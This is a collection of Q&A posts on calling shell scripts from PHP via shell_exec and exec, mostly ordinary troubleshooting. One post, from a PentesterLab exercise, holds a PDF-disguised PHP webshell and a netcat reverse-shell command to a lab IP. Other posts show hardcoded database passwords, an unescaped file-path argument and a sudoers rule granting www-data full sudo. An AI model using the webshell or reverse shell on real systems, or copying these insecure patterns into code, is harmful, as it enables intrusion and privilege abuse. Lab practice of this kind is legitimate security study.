I have a shell script like this (in /usr/local/bin/esm-script/import-master.php):
#! /bin/bash
echo "this is the file name $1."
script -c 'PGPASSWORD="pwd123" /usr/bin/psql --host localhost --port 5432 --username "postgres" --no-password --quiet "dbESM" < "$1"' /dev/null
Now I'm calling it through a PHP script like this:
$NewFile = "/var/www/...master-data.sql"; //full path
$strImport = '/usr/local/bin/esm-script/import-master.sh ' . $NewFile;
$strMsg = shell_exec($strImport);
echo "$strMsg<br />";
echo 'done!';
However, when I run the PHP code, this is the message I get on the browser:
this is the file name /var/www/ESM-Backend/uploads/master-data.sql. Script started, file is /dev/null Script done, file is /dev/null sh: 1: cannot open : No such file Script started, file is /dev/null
done!
I'm not a shell scripting person so I don't know if I'm missing something.
I've checked that the folder with the sql file has the correct permissions (775) and has data (insert statements).
So why does this not work? Any ideas and guidelines are really appreciated.
EDIT
I hard-coded the file in the shell script file like this:
script -c 'PGPASSWORD="#UR!23" /usr/bin/psql --host localhost --port 5432 --username "postgres" --no-password --quiet "dbESM" < "/var/www/ESM-Backend/uploads/master-data.sql"' /dev/null
And it works. But I need it to run with the file passed through PHP.
I think the problem might be with the way you are passing the argument to your shell script i.e. $NewFile. From a relevant SO Post, you might want to try enclosing the argument(s) in double quotes like this:
$strImport = '/usr/local/bin/esm-script/import-master.sh "'.$NewFile.'"';
I'm assuming the permissions are set correctly and you are able to use shell_exec() normally to execute shell scripts via PHP. Hope this helps.
First, a big thank you for Vivek for giving me the idea of using quotes. I then thought that the the error was the way the command-line argument was enclosed within single quotes in the shell script file.
So I tried the following:
script -c 'PGPASSWORD="#UR!23" /usr/bin/psql --host localhost --port 5432 --username "postgres" --no-password --quiet "dbESM" < "'$1'"' /dev/null
And yes, it solved the problem.
The idea is that the $1 argument was given outside of the quoted string for the script command.
I also had the doubt on how to concatenate strings in bash and here's a great link I found for it: How to concatenate string variables in Bash?
Related
I have a bash script that takes a parameter is called in PHP by shell_exec(script.sh parameter). Basically, my goal is to call a script that is owned by another user that is not apache.
The script.sh script is a file that contains the following (right now there are some error handling commands):
#/bin/bash
whoami>>whoami
echo $1 >> parameter
while read f; do
env>>envoutput
sudo -i -u archivescriptowner /path/to/archivescript.sh -command archive >> output
done < $1
In my /etc/sudoers file , I have the following:
apache ALL=(archivescriptowner) NOPASSWD: /bin/bash -c /path/to/archivescript.sh *
When I run this script as by running su -s /bin/bash apache and pass a parameter, it works.
When I run it via my button in php, archivescript.sh does not execute
The whoami file has apache written to it
The parameter file has the right file written to it
env shows the following
Term=xterm
LD_LIBRARY_PATH=/path/to/library
PATH=/sbin/:usr/sbin:/bin:/usr/bin
PWD=/var/www/html
LANG=C
SHLVL=4
=/bin/env
PWD is outputting right, that is where my script is right now, it will be moved in the future.
The output file when it is ran by the button click is blank.
I am at a loss as to why this is not working. Any insight would be helpful. Please let me know if I need to give any additional information.
I recently published a project that allows PHP to obtain and interact with a real Bash shell. Get it here: https://github.com/merlinthemagic/MTS
After downloading you would simply use the following code:
$shell = \MTS\Factories::getDevices()->getLocalHost()->getShell('bash', true);
$return1 = $shell->exeCmd('/path/to/archivescript.sh');
echo $return1; //return from your script
I'm trying to execute a command through PHP with shell_exec. The PHP file is hosted by Apache on my Ubuntu server.
When I run this:
echo shell_exec("ps ax | grep nginx");
Then I get to see data. But when I run another command, for example:
echo shell_exec("cat /usr/local/nginx/config/nginx.config");
Then it's not showing anything at all. But when I copy that command and paste it in my terminal, then it executes fine.
My Apache server is running as user www-data. So I edited sudoers and added this line:
www-data ALL=(ALL:ALL) ALL
I know this is a security risk, but I wanted to make sure (for now) that www-data is able to execute all commands. But, for some reason I'm still not able to execute all commands with my PHP script.
Anyone any idea what to do?
have you read http://php.net/manual/en/function.shell-exec.php
There is quite a discussion in comments section. Top comment is:
If you're trying to run a command such as "gunzip -t" in shell_exec and getting an empty result, you might need to add 2>&1 to the end of the command, eg:
Won't always work:
echo shell_exec("gunzip -c -t $path_to_backup_file");
Should work:
echo shell_exec("gunzip -c -t $path_to_backup_file 2>&1");
In the above example, a line break at the beginning of the gunzip output seemed to prevent shell_exec printing anything else. Hope this saves someone else an hour or two.
echo shell_exec("sudo cat /usr/local/nginx/config/nginx.config");
Try that.
I am doing an exercise of PentesterLab,
I've got a webshell called 1.pdf, and it can be included in index.php as a PHP file. It contains code like this:
%PDF-1.4
<?php
echo system($_GET["cmd"]);
?>
Now I want to create a reverse shell using nc with following commands, but it does not work properly:
index.php?page=uploads/1.pdf%00&cmd=/bin/nc 192.168.117.128 8001 -e /bin/bash
If I input commands at 192.168.117.128 then enter, nothing was output.
While, if I run the following commands directly in the VM(the target server), it connects to the attacker properly:
/bin/nc 192.168.117.128 8001 -e /bin/bash
Output of commands are properly echoed at 192.168.117.128
I wonder why netcat works in VM properly but does not work in webshell?
Anyone's help is appreciated, thanks.
It's quite simple, and I'm out of ideas. I'm sure there is a quick workaround.
exec('echo 123 &> /var/log/123.log');
I'm sure it's not about the permissions, because the file 123.log is created, but it's just- empty. I've also tried shell_exec, but it doesn't create the file at all.
Also tried all variants of redirection, i.e. 1> 2> >.
Using PHP to capture the output is not the option, as the output in production is huge, and I don't want to run into memory issues.
Any ideas appreciated.
Btw, I'm using Ubuntu 12.04 LAMP.
Debian and Debian based Linux distributions like Ubuntu are using dash and not bash as /bin/sh by now.
&> is a bash extension, the dash does not know about.
The correct posix-compatible way to write cmd &> file is cmd > file 2>&1
cmd > file 2>&1 works in all posix-compatible shells: dash, bash, ksh, zsh, ash ...
So you need to change your code to:
exec('echo 123 > /var/log/123.log 2>&1');
Try shell_exec without &:
echo shell_exec("echo 123 > /var/log/123.log");
Only thing that did help was to create a shell script with exec permissions, e.g. test.sh:
#!/bin/bash
echo 123 &>> /var/log/123.log
and execute it like this:
shell_exec('[full path to]/test.sh');
So, redirection operator is not important, but everything else is (#! directive, shell_exec).
I am trying to Execute a multiple commands in php using exec() and shell_exec but i am getting a null value back which i shouldn't and nothing is happening (if i copy and paste the strings below in the command line it will work fine and accomplish the job needed) this is the commands i am using:
$command = "cd /../Desktop/FolderName;";
$command .= 'export PATH=$PATH:`pwd`;';
$command .= 'Here i execute a compiler;';
and then i use the escapeshellcmd()
$escaped_command = escapeshellcmd($command);
then
shell_exec($escaped_command);
any ideas what i am doing wrong and i also tried escapeshellarg() instead of escapeshellcmd()?
Solution: the Problem was the permission of the execution compiler for other owners is non and this was the problem.
because when you are using exec() function in php the owner of the file will be www-data so you need to give permission for the www-data either from the ACL of ubuntu or whatever linux based operating system(you can know the owner by doing this exec('whoami')), or by the files you need to execute.
(Sorry my bad English)
On Linux you can add your Commands in a Shell Script.
You can put this in any file:
#!/bin/bash
cd /../Desktop/FolderName
export PATH=$PATH:`pwd`
EXECUTE COMPILER
And save this as fille.sh
Then, add execution permissions:
chmod +x path/to/file.sh
From PHP, you can call this Script executing:
shell_exec('sh path/to/file.sh');
Hope this helps!